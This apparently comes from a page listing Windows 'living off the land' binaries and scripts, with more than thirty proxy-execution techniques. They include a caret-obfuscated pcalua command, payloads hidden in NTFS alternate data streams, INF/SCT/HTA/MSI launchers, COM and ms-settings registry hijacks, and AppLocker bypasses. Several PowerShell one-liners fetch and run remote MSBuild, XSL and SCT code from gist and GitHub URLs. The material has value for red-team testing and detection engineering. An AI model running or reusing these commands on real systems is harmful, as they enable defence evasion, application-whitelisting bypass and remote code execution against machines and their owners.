
lolbas222's Introduction

####################### | # | APT # | # #######################

( 1 ) Execute via pcalua.exe (Program Compatibility Assistant). The command below is written in caret-escaped form: cmd.exe strips every `^` before the line is executed, so the interpreter sees a plain `pcalua -n -a... calc.exe` while naive string matching on the raw command line does not. Detection logic should normalize carets out of the command line before matching on the binary name.

p^c^a^l^u^a^ ^-^n^ ^-^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^n^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a
^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a^^a^a^a^a^a^a^a^a^a^a calc.exe

( 2 ) Hide the payload in an NTFS Alternate Data Stream (ADS). The batch file is copied into the `x22x2` stream of test.txt and then executed from that stream; the stream is invisible to a plain `dir` but can be enumerated with `dir /r` or `Get-Item -Stream *` in PowerShell.

cmd.exe:> type C:\Users\Gihad\Desktop\file.bat > C:\Users\Gihad\Desktop\test.txt:x22x2
cmd.exe:> netsh exec C:\Users\Gihad\Desktop\test.txt:x22x2

( 3 ) pnputil.exe launcher via .INF. Note: every .INF technique on this page works only with the author's INFScript (linked below). Caveats for testers: `pnputil /add-driver` normally requires an elevated prompt, and an unsigned driver package may be rejected by driver signature enforcement on current Windows builds.

pnputil.exe /add-driver C:\FilesINFExecution.inf /install

&- My Code INFScript Injection Command Line 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 4 ) INFDefaultInstall Launch Execute INFScript

INFDefaultInstall.exe C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 5 ) setupapi.dll — execute the INFScript via InstallHinfSection. The call must go through rundll32 (as in items 8 and 12); the bare `setupapi.dll,...` form that originally appeared here is not a runnable command on its own.

rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 132 C:\INFPS.inf
&-  Code INFScript 
https://gist.githubusercontent.com/homjxi0e/a27e34d7be34731fb637e820c883c8bc/raw/1414b5efd3f1c35d56382b1a1dfe7b455f1fe9bc/INFPS.inf

( 6 ) DLL Execution Using ( Reflection ) In CPLEx AccessibilityCPL RegServer

&- Add a value under the registry key ms-settings\Shell\Open\command (the original notes HKLM; the commonly documented variant of this hijack writes the per-user HKCU\Software\Classes\ms-settings\Shell\Open\command key, which needs no administrator rights — verify which hive the target build honours)
&- rundll32 accessibilitycpl.dll,DllRegisterServer 
&- rundll32 shell32.dll,Control_RunDLL "C:\Windows\System32\desk.cpl"   (path corrected: the original read `C:\Windows\tem32\desk.cpl`, which does not exist)

( 7 ) Language LUA in Files .wlua

wlua.exe C:\testing.wlua
&- Example Lua payload that launches an executable. Note that wlua.exe is not part of Windows; it must already be present on the host (e.g. from a Lua for Windows installation).
https://gist.githubusercontent.com/homjxi0e/bbd218dea9bf63fd36524b9777a399f3/raw/888f7e484651fdb733d6261ca002d684a6e5bf9b/Test.wlua

( 8 ) SCT ScriptLet Execution in My INFScript

rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\INFPS.inf
&- Raw Code 
https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415

( 9 ) Execute JScript from PowerShell via Microsoft.JScript.Eval and the VSA engine. This runs inside powershell.exe, so it is subject to PowerShell script-block logging and AMSI on Windows 10 and later; LoadWithPartialName is a deprecated API but is still present in .NET Framework.

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JSCript')
$attack = 'var invokeMethod = new ActiveXObject("WScript.Shell");invokeMethod.Run("notepad.exe")'
[Microsoft.JScript.Eval]::JScriptEvaluate($attack,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
&- Code Execute
https://gist.githubusercontent.com/homjxi0e/0d683007bd4a3ce39d3e19342aaa68ec/raw/4c8709382280de158b99dd78f91875e32a54bac4/ATPSJScript

( 10 ) MSI Launch Execution ( MsiExec.exe )

 msiexec.exe /passive /i C:\testing.msi /norestart 
 &- Example .MSI package that launches an executable. `/passive` shows only a progress bar (no prompts) and `/norestart` suppresses any reboot prompt.

( 10v1 ) COM Component object Model Hijacking

&- Add Reg in System 
https://gist.githubusercontent.com/homjxi0e/8e42aa716361dc41b1c45a314bea501c/raw/327104671eebad1361210524f34076503e6b8e44/COM-hijacking.reg
&- With the hijacked CLSID registered, xwizard.exe can be used to instantiate it (the CLSID below is presumably the one written by the .reg file above)
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}

( 10v2 ) Execute VBScript Via mshta.exe

&- Execute VBScript Code using mshta.exe
mshta.exe VBScript:Close(Execute("Set S=CreateObject(""WScript.Shell""):If S.AppActivate(""maybe-Run"")=False Then:S.Run(""C:\Windows\system32\Calc.exe""):End If"))
https://gist.githubusercontent.com/homjxi0e/eb16d75f3db6d6081648f2c5c5c98c3b/raw/0870f7553095dcf6519f93c1cf72c6415468140b/VBSExC

( 10v3 ) forfiles.exe proxy execution. forfiles runs the `/c` command once for every file matched in the current directory, which is why calc windows keep appearing ("endless"); use `/p <dir>` and `/m <mask>` to restrict it to a single file.

forfiles.exe /c calc.exe

( 10v4 ) Powershell Scriptlet COM Object Hijacking via System.Activator

$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
https://gist.github.com/homjxi0e/40f30c3be62c6ef152d6f6fffa9dba3c

( 10v5 ) ScriptRunner.exe Execution

ScriptRunner.exe -appvscript C:\Windows\System32\calc.exe

( 10v6 ) msdt.exe — execute an EXE/MSI referenced from an answer-file XML, launched through the Program Compatibility Wizard (Pcwrun.exe) diagnostic package

 msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 &- link file PCW8E57.xml
 https://gist.github.com/homjxi0e/3f35212db81b9375b7906031a40c6d87

( 10v7 ) Launch an MSI package from PowerShell (Install-Package)

install-Package C:\test.msi
https://github.com/homjxi0e/MSIScript/blob/master/Exec-Execute.msi

( 10v8 ) DLL proxy execution — pcwutl.dll LaunchApplication via rundll32

rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe

( 10v9 ) HTA/MSI Execute Using OpenWith.exe

Application-whitelisting (SRP/AppLocker) bypass using `OpenWith.exe /c` to launch an HTA or MSI
&- OpenWith.exe /c C:\test.hta 
&- OpenWith.exe /c C:\testing.msi

( 10v11 ) XrML Digital License (.xrm-ms) ActiveX

iexplore.exe C:\test.xrm-ms   (binary name corrected: Internet Explorer's executable is iexplore.exe, not "iexplorer")
https://gist.github.com/homjxi0e/099d8f35f3b2e1b7daa7cbe366df1ed3
 

( 10v12 ) Execute via an Internet Shortcut (.url) file

start C:\obj.url
https://gist.github.com/homjxi0e/0023a9cb5d4fee198019f87bd348effc

( 10 v13 ) ActiveX executing using a SVG Document

iexplore.exe C:\PoC.svg   (binary name corrected: Internet Explorer's executable is iexplore.exe, not "iexplorer")
https://gist.github.com/homjxi0e/4a38b2402e77a536a4deb17928f9a8b0

(10v14) Dxcap.exe abuse (DirectX graphics capture tool that typically arrives with Visual Studio; it is not present on a stock Windows install)

Dxcap.exe -c C:\Windows\System32\notepad.exe    

( 11 ) HTA launch via url.dll (technique credited to @bohops)

Rundll32.exe url.dll,OpenURL <path to local .hta file (or other file with a registered handler)>

( 12 ) SCT Launch Execution InSide INFScript ( ieadvpack.dll )

rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1, 

( 13 ) Execute code via a remote MSBuild project file loaded with Reflection.Assembly in PowerShell (the .proj is fetched from a gist over the network and built in-process, so this requires outbound HTTPS)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj); 
$e.build();

( 14 ) CSharp Launch Execution Via Reflection.Assembly Powershell

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build'); $e=new-object Microsoft.Build.Evaluation.Project('evil.csproj'); $e.Build();   (the `http://` prefixes in the original line were an auto-link artifact, not part of the command — compare item 13)

( 15 ) SCT Execution Via INFScript By ( advpack.dll )

rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,

( 16 ) Execute script embedded in an XSL stylesheet via System.Xml.Xsl.XslCompiledTransform with EnableScript set (PowerShell). Both the stylesheet and the input XML are fetched over the network, and the `z` output file is deleted afterwards.

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

( 17 ) SCT launch via Reflection.Assembly and Microsoft.VisualBasic.Interaction.GetObject (the trailing ` …` that originally appeared inside the URL was a copy/paste truncation artifact and is not part of the string)

 [Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct').Exec(0)

( 18 ) SCT launch via Reflection.Assembly and Microsoft.JScript (the trailing ` …` that originally appeared inside the URL was a copy/paste truncation artifact and is not part of the string)

[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())

( 19 ) AppLocker bypass via CL_LoadAssembly.ps1 (a Microsoft-signed diagnostic script). LoadAssemblyFromPath loads its argument as a .NET assembly, so the path should point to a managed DLL/EXE; the native calc.exe shown below is unlikely to load as written — verify against the script before relying on it.

import-module C:\windows\diagnostics\system\AERO\CL_LoadAssembly.ps1
LoadAssemblyFromPath C:\Windows\System32\calc.exe

( 20 ) Launch an HTA via shdocvw.dll OpenURL — the argument is a local .url Internet Shortcut whose target is the HTA

rundll32.exe shdocvw.dll, OpenURL <path to local URL file>

( 21 ) Launch an HTA via ieframe.dll OpenURL — the argument is a local .url Internet Shortcut whose target is the HTA

rundll32.exe ieframe.dll, OpenURL <path to local URL file>

( 22 ) Command execution via vshadow.exe (Volume Shadow Copy sample tool from the Windows SDK — it does not ship with Windows, and creating a shadow copy requires administrator rights). The documented syntax is `-exec=<path>`, e.g. `vshadow.exe -nw -exec=C:\Windows\System32\calc.exe C:`; the shorthand below may need adjusting.

 Vshadow exec calc.exe

( 23 ) C# execution via Microsoft.Build.Execution.ProjectInstance (Reflection.Assembly + PowerShell) — builds a local .csproj that carries the payload, so the code runs inside the PowerShell process rather than in msbuild.exe

[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build')
$p="c:\test\test.csproj"
$e=new-object Microsoft.Build.Execution.ProjectInstance($p)
$e.build()
